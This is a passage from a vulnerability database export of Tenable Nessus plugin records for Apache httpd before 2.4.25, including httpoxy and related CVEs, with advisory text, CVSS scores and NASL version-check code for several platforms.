Additionally, an\n attacker could intercept unsecured (HTTP) transmissions via the HTTPoxy\n vulnerability.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.apache.org/security/asf-httpoxy-response.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://httpoxy.org/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201701-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.4.25'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 2.4.25\"), vulnerable:make_list(\"lt 2.4.25\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-10T17:25:43", "description": "The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. 
(CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. 
(CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-06-26T00:00:00", "title": "Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2017-06-26T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_APACHE_2_4_25.NASL", "href": "https://www.tenable.com/plugins/nessus/101044", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101044);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/09\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-5387\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\"\n );\n script_bugtraq_id(\n 91816,\n 94650,\n 95076,\n 95077,\n 95078\n );\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n\n script_name(english:\"Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)\");\n script_summary(english:\"Checks the version of Apache in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains a\nweb server that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. 
It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. 
An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2017-04\");\n script_set_attribute(attribute:\"see_also\", value:\"https://static.tenable.com/prod_docs/upgrade_security_center.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.4.3 or later.\nAlternatively, contact the vendor for a patch.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor advisory.\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n \n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/httpd/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Apache (within SecurityCenter)\";\nfix = \"2.4.25\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/httpd/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"2.3\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter Apache version : ' + version +\n '\\n Fixed Apache version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T09:10:57", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "edition": 22, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": 
"2016-12-27T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2016-358-01) (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2016-12-27T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2016-358-01.NASL", "href": "https://www.tenable.com/plugins/nessus/96090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-358-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96090);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n script_xref(name:\"SSA\", value:\"2016-358-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2016-358-01) (httpoxy)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.495677\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?897798bc\"\n );\n script_set_attribute(attribute:\"solution\", 
value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.25\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, 
extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:54:44", "description": "Apache Software Foundation reports :\n\nPlease reference CVE/URL list for details", "edition": 27, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-21T00:00:00", "title": "FreeBSD : Apache httpd -- several vulnerabilities (862d6ab3-c75e-11e6-9f98-20cf30e32f6d) (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2016-12-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache24"], "id": "FREEBSD_PKG_862D6AB3C75E11E69F9820CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/nessus/96037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96037);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n\n script_name(english:\"FreeBSD : Apache httpd -- several vulnerabilities (862d6ab3-c75e-11e6-9f98-20cf30e32f6d) (httpoxy)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache Software Foundation reports :\n\nPlease reference CVE/URL list for details\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://httpd.apache.org/security/vulnerabilities_24.html\"\n );\n # https://vuxml.freebsd.org/freebsd/862d6ab3-c75e-11e6-9f98-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5975d85c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24<2.4.25\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-29T09:19:54", "description": "According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.25. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. 
(CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. 
(CVE-2016-8743)\n\n - A CRLF injection allowing HTTP response splitting attacks for \n sites which use mod_userdir (CVE-2016-4975)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 35, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-12T00:00:00", "title": "Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-4975", "CVE-2016-8743", "CVE-2020-11985", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2017-01-12T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_4_25.NASL", "href": "https://www.tenable.com/plugins/nessus/96451", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96451);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/28\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-4975\",\n \"CVE-2016-5387\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\",\n \"CVE-2020-11985\"\n );\n script_bugtraq_id(\n 91816,\n 94650,\n 95076,\n 95077,\n 95078,\n 105093\n );\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n\n script_name(english:\"Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks the version in the server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.25. 
It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. 
